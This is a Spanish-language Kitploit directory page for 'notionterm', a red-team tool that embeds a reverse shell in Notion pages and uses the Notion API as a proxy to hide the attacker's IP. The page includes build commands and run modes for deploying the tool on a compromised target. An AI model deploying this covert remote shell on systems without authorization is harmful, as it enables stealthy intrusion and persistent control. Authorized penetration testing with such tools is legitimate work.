Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
notionterm — Incrusta un reverse shell en páginas de Notion utilizando la API de Notion como proxy, habilitando sesiones de shell remoto sigilosas con comunicación cifrada y autenticada para operaciones de red team. | Kitploit
Herramientas/GitHubGitHub/ariary/notionterm
Generación de PayloadsExplotaciónIngeniería InversaSeguridad WebComando y ControlRed Teaming
GitHubariary/notionterm

notionterm

Incrusta un reverse shell en páginas de Notion utilizando la API de Notion como proxy, habilitando sesiones de shell remoto sigilosas con comunicación cifrada y autenticada para operaciones de red team.

Ver Repositorio
13715hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

notionterm

Incrusta una reverse shell en páginas de Notion.
Hackea mientras tomas notas


demo


PARA ➕:

  • Ocultar la IP del atacante en una reverse shell (Sin interacción directa entre el atacante y la máquina objetivo. Se usa Notion como proxy que aloja la reverse shell)
  • Insertar una demo/prueba rápida en un informe
  • Reverse shell de alta disponibilidad y compartible (escritorio, navegador, móvil)
  • Shell remota cifrada y autenticada

NO PARA ➖:

  • Sesiones de shell largas e interactivas (consulta tacos para eso)

¿Por qué? 🤔

El objetivo era hacer algo divertido pero a la vez utilizable, aunque no pretende ser LA solución para reverse shell en el arsenal del pentester

¿Cómo? 🤷‍♂️

Solo usa Notion como de costumbre y ejecuta notionterm en el objetivo.

Requisitos 🖊️

  • Software de Notion y clave API
  • Comunicación HTTP permitida desde el objetivo hacia el dominio de Notion
  • RCE previa en el objetivo

aproximadamente inspirado por la gran idea de OffensiveNotion y notionion!

TL;DR

Aprender comandos y flags es demasiado aburrido: Usa wrap-notionterm.sh

Inicio rápido

🏗️ Configuración

  1. Crea una página y otorga a la clave API de la integración permisos de escritura en la página.
  2. Compila notionterm y transfiérelo a la máquina objetivo (ver Compilación)

👟 Ejecución

Hay 3 formas principales de ejecutar notionterm:

Modo "normal"
Obtén terminal, detén/reanuda, etc...
notionterm [flags]
Inicia la shell con el widget de botón: ponlo en ON, haz tus cosas de reverse shell, ponlo en OFF para pausar, ON para reanudar, etc...
Modo "servidor"
Facilita la inserción de notionterm en cualquier página
notionterm --server [flags]
Inicia una sesión de shell en cualquier página creando un bloque de inserción con una URL que contenga el id de la página (CTRL+L para obtenerlo): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].
Modo light
Solo realiza tráfico HTTP desde el objetivo → Notion
notionterm light [flags]

Compilación

Dado que notionterm está pensado para ejecutarse en la máquina objetivo, debe compilarse para adaptarse a ella.

Por lo tanto, configure la variable de entorno para que coincida con el requisito del objetivo:

root@kitploit:~
GOOS=[windows/linux/darwin]

Compilación simple

root@kitploit:~
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go

Necesitarás establecer la clave API y la URL de la página de Notion usando variables de entorno (NOTION_TOKEN & NOTION_PAGE_URL) o flags (--token & --page-url)

Compilación "Todo incluido"

Incrusta directamente el token de API de integración de Notion y la URL de la página de Notion en el binario. ⚠️ Cualquier persona con acceso al binario puede recuperar el token. Por motivos de seguridad, no lo compartas y elimínalo después de usarlo.

Configura las variables de entorno correspondientes:

root@kitploit:~
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]

Y compílalo:

root@kitploit:~
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS
Descargar herramienta